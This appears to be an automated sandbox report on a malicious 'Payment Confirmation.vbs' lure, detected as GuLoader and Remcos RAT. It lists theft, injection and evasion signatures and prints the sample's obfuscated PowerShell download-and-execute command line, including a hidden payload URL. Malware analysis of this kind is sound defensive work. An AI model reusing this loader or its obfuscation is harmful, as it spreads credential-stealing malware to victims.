Windows
Analysis Report
Payment Confirmation.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7708 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Payme nt Confirm ation.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 7836 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Viljestr k Taxies D atch Unexp losively U nclipper o psadlede K nox Byguer illaernes Dragen Fyr stehoffern es Psocids Thetarytm e Dommerkl ub Antidot ed Bactero ides47 Foe rstedel Re ndzina Def initionsmn gderne244 Forngteren s Tillgsbe talings Si ris Reprod ucerer Sko vfogedbler ne Credo V iljestrk T axies Datc h Unexplos ively Uncl ipper opsa dlede Knox Byguerill aernes Dra gen Fyrste hoffernes Psocids Th etarytme D ommerklub Antidoted Bacteroide s47 Foerst edel Rendz ina Defini tionsmngde rne244 For ngterens T illgsbetal ings Siris Reproduce rer Skovfo gedblerne Credo';If (${host}.C urrentCult ure) {$Ban derillero+ +;}Functio n Mashlin( $Corban){$ Goosing=$C orban.Leng th-$Bander illero;$So lubilities 180='SUBsT RI';$Solub ilities180 +='ng';For ( $aflvnin gsmiddels= 7;$aflvnin gsmiddels -lt $Goosi ng;$aflvni ngsmiddels +=8){$Vilj estrk+=$Co rban.$Solu bilities18 0.Invoke( $aflvnings middels, $ Banderille ro);}$Vilj estrk;}fun ction Cath olicate($L yncine){ . ($Svin ske25) ($L yncine);}$ Sikhens=Ma shlin ' Ru genbMItali enoKdery,e zBefugteiP h,tololFho vedel.udge realserund /Koasuta5 Bribeg.Cle arhe0Under ud Lolansp (kamgavlWM awingriOve rfo.n Over p dGnarred oopportuw. ahabeas Pr eemp Ant n agNEf.ersp T Preter B linde1Utaa lmo0Parker i.Fontina0 E rthin; o nabso .ort idsWf ikti oiG,uppean Nonconc6Ar acari4 Abb ots;R aens b Trinervx Moni,o6Ob serv.4 Bre pil;Sognef o Cyc,otrH .lautov Ls sene:Polye s.1Prkener 2 Allahc1j ongl,r. Re inco0 Dedu ct)Gleaned T easurGk autionePol i urc Tpdh erk Sukker ocarpopo/F a litt2Gor dyfy0Desil ve1 Langpl 0Coconsc0S enatus1Par apla0Merci fy1 tartb Underb,FOv erhrti Rel igirmodula te Statssf ChieftoBo rtforxLogf ile/ Uncli n1Flyttel2 Nepotis1Bv err t.Dis ppo0Sammen s ';$Sensa tioner=Mas hlin 'Soli ngkUCell.r esSkybrude ,nshakerSc andal- Cen timAp,eocc ugParad.ne LimphanEf fluent Pla .tp ';$Unc lipper=Mas hlin ' Skr ifthSk.lep at vangsft Overextp S nren :Dige bru/ Brugs v/Stenion1 sandema0 K mmar3Drik kes.Talion i2Sacr me3 General7po stco,.V,re lag8E,cyof f6elfenbe. Adfrds.2Mi jn,ee4Colo rif7Semian a/SkrigedD TaksatiaSp rogbrg Suc c.dustille veIverensr Agrafedr.e hndige Tus indoDeamin atj,nerely Bequotep A triumi Fro wnsePushil yrM usehan Sarinoseaa bentvsNoug ,te.Cockpi tfM,slingl W.istwaaku ratel ';$G esjftigste s=Mashlin '.acemak>C oglori ';$ Svinske25= Mashlin ' U,ilisiSun dhedeMedme nnxPr,stit ';$Bmw='B yguerillae rnes';$Ans kaffedes = Mashlin ' Isblokke O pht.acMadn esshPrygle ro Dep le Prevari%H ircapaSugg estpCivilb epFrbaaded Guldfatain dm,dstOver gloaFarve. r%Fuldebd\ BunddkkRge mmedmePrei nven Shi k ioIntensiw Fo,staanEu